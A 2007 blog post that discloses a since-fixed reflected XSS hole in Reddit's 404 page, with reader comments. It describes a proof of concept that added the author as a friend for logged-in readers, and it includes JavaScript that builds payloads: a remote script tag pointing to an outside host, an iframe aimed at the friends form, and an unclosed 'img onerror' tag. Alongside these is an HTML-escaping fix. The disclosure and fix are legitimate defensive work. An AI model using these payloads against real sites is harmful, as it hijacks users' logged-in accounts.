XSS Hole in Reddit Allows Gaping Access: Proof of Concept

Fixed by Reddit.

So, a few months back Digg added a new feature that made inviting and adding friends easier. Unfortunately, as I reported then, that feature had a CSRF hole: any site could automatically add friends to the account of a visitor who was still logged into Digg.

That story did quite well on Reddit, which is often considered a Digg rival, actually outperforming the same story on Digg, where it was, unsurprisingly, quickly buried.

Nevertheless, an XSS hole in Reddit's handling of non-existent pages (its 404 page) creates a gaping hole that lets a third-party site perform almost any site function it wants on behalf of a logged-in user. To be fair to Reddit, I figured the proof of concept should mimic the one I did for Digg: an auto friend adder. If you are reading this page while logged into Reddit, and the hole has not yet been fixed, you will add “rjonesx” as a friend.

By using the most basic XSS and CSRF techniques, I was able to do the following:

  1. Inject a remote script into the 404 page by way of the URL (http://www.thegooglecache.com/reddit-friends-adder.js)
  2. Inject, into that same 404 page, an iframe pointing at the /prefs/friends page
  3. Have the remote script wait a short fixed delay for the iframe to load, then fill out and submit the form on the /prefs/friends page to add rjonesx as a friend

The solution, of course, is as simple as any good XSS fix: don’t echo the URL into the page. If you must, strip all HTML from it. Better still, HTML-escape it rather than strip it; tag-stripping filters are routinely bypassed (an unclosed tag, for one, has no closing bracket for a stripper to match), whereas entity-encoding &, <, >, " and ' leaves nothing for the browser to parse as markup. Note too that a per-form CSRF token would not have saved /prefs/friends here: the injected script runs on the reddit.com origin itself and can read the token straight out of the framed form.
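To make the three steps above and the fix concrete, here is an added example (not Reddit's code, not the script from the proof of concept): a hypothetical 404 handler that reflects the requested path into the page, first unescaped, then with the naive “strip all HTML” treatment, then HTML-escaped. The attacker path is constructed here and packs steps 1 and 2 into a single request; all function names are assumptions for illustration.

```javascript
// Added example, not Reddit's code: a model of the reflected-XSS bug class the
// post describes (a 404 handler that echoes the requested path into the page)
// next to the fix. Every name here is hypothetical.

// Constructed attacker path packing the post's three steps into one request:
// a remote script tag (step 1) and an iframe onto /prefs/friends (step 2);
// the remote script itself would do step 3 once the iframe has loaded.
const REMOTE_SCRIPT = "http://www.thegooglecache.com/reddit-friends-adder.js";
const PAYLOAD_PATH =
  "/no-such-page" +
  `<script src="${REMOTE_SCRIPT}"></script>` +
  `<iframe id="prefs" src="/prefs/friends"></iframe>`;

// Vulnerable renderer: the raw path lands inside the HTML, so any markup in
// it is parsed by the browser.
function render404Vulnerable(path) {
  return `<html><body><h1>404</h1><p>${path} was not found.</p></body></html>`;
}

// The post's "strip all HTML" advice, done the naive way (drop <...> pairs).
function stripTagsNaive(s) {
  return s.replace(/<[^>]*>/g, "");
}
function render404Stripped(path) {
  return `<html><body><h1>404</h1><p>${stripTagsNaive(path)} was not found.</p></body></html>`;
}

// Hardened renderer: entity-encode every character that can start or end
// markup or an attribute, so nothing in the path is parsed as a tag.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ENTITIES[c]);
}
function render404Safe(path) {
  return `<html><body><h1>404</h1><p>${escapeHtml(path)} was not found.</p></body></html>`;
}

// Lists tag names in the rendered page that are not part of the template,
// i.e. tags that came from the attacker-controlled path.
function injectedTags(html) {
  const templateTags = new Set(["html", "body", "h1", "p"]);
  const found = [];
  for (const m of html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g)) {
    const name = m[1].toLowerCase();
    if (!templateTags.has(name)) found.push(name);
  }
  return found;
}

// An unclosed tag has no ">" for the naive stripper to match, so it survives
// stripping and is closed for free by the template's own "</p>" when the
// browser tokenises the page; escaping neutralises it.
const UNCLOSED_PATH = "/x<img src=x onerror=alert(1)";

// Stand-alone demo.
if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable :", injectedTags(render404Vulnerable(PAYLOAD_PATH)));
  console.log("stripped   :", injectedTags(render404Stripped(UNCLOSED_PATH)));
  console.log("escaped    :", injectedTags(render404Safe(PAYLOAD_PATH)));
}
```

Run it with `node` and the vulnerable renderer reports the injected `script` and `iframe` tags, the stripped renderer still reports the `img` from the unclosed-tag path, and the escaped renderer reports nothing. The point of the design is that escaping is a pure encoding step that needs no knowledge of what the attacker might send, while stripping is a blacklist that has to anticipate every tokeniser quirk.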


3 Comments

  1. Aerik
    Jun 27, 2007

    The latest version of Firefox’s NoScript extension (since he started calling it “the XSS Punisher”) is easily preventing your demo.

    Cheers!

    Note: That extension deserves a link! Excellent. Thanks for pointing it out, Aerik.

  2. Aerik
    Jun 28, 2007

    I noticed that when I marked this domain untrusted, and even after I added *googlecache* to Adblock Plus, NoScript 1.1.4.9… was still telling me about sanitizing your demo here. I asked NoScript’s developer to allow us to remove the URI about:neterror from the whitelist. He took my advice, and has updated to 1.1.5. I’ve removed about:neterror from the whitelist, and now finally, your demo doesn’t even get far enough to need sanitizing. It’s a damn good extension.

  3. Aerik
    Jun 28, 2007

    Oh, wait… I saw just now, after the page refreshed, that Reddit fixed the problem. My bad. XO

Trackbacks/Pingbacks

  1. Web Tantousha Forum - 8 SEO questions that even I, an expert, can't answer... [Translated selected overseas sites] SEOmoz search marketing news & techniques: “What if you put several links to the same page on one page?” “Once a link has been made and is then deleted, the original lin...
  2. Stumbleupon Cross-Site Scripting Vulnerability - [...] I have previously identified XSS and/or CSRF vulnerabilities in both Digg and Reddit, Stumbleupon has largely remained innocuous to…
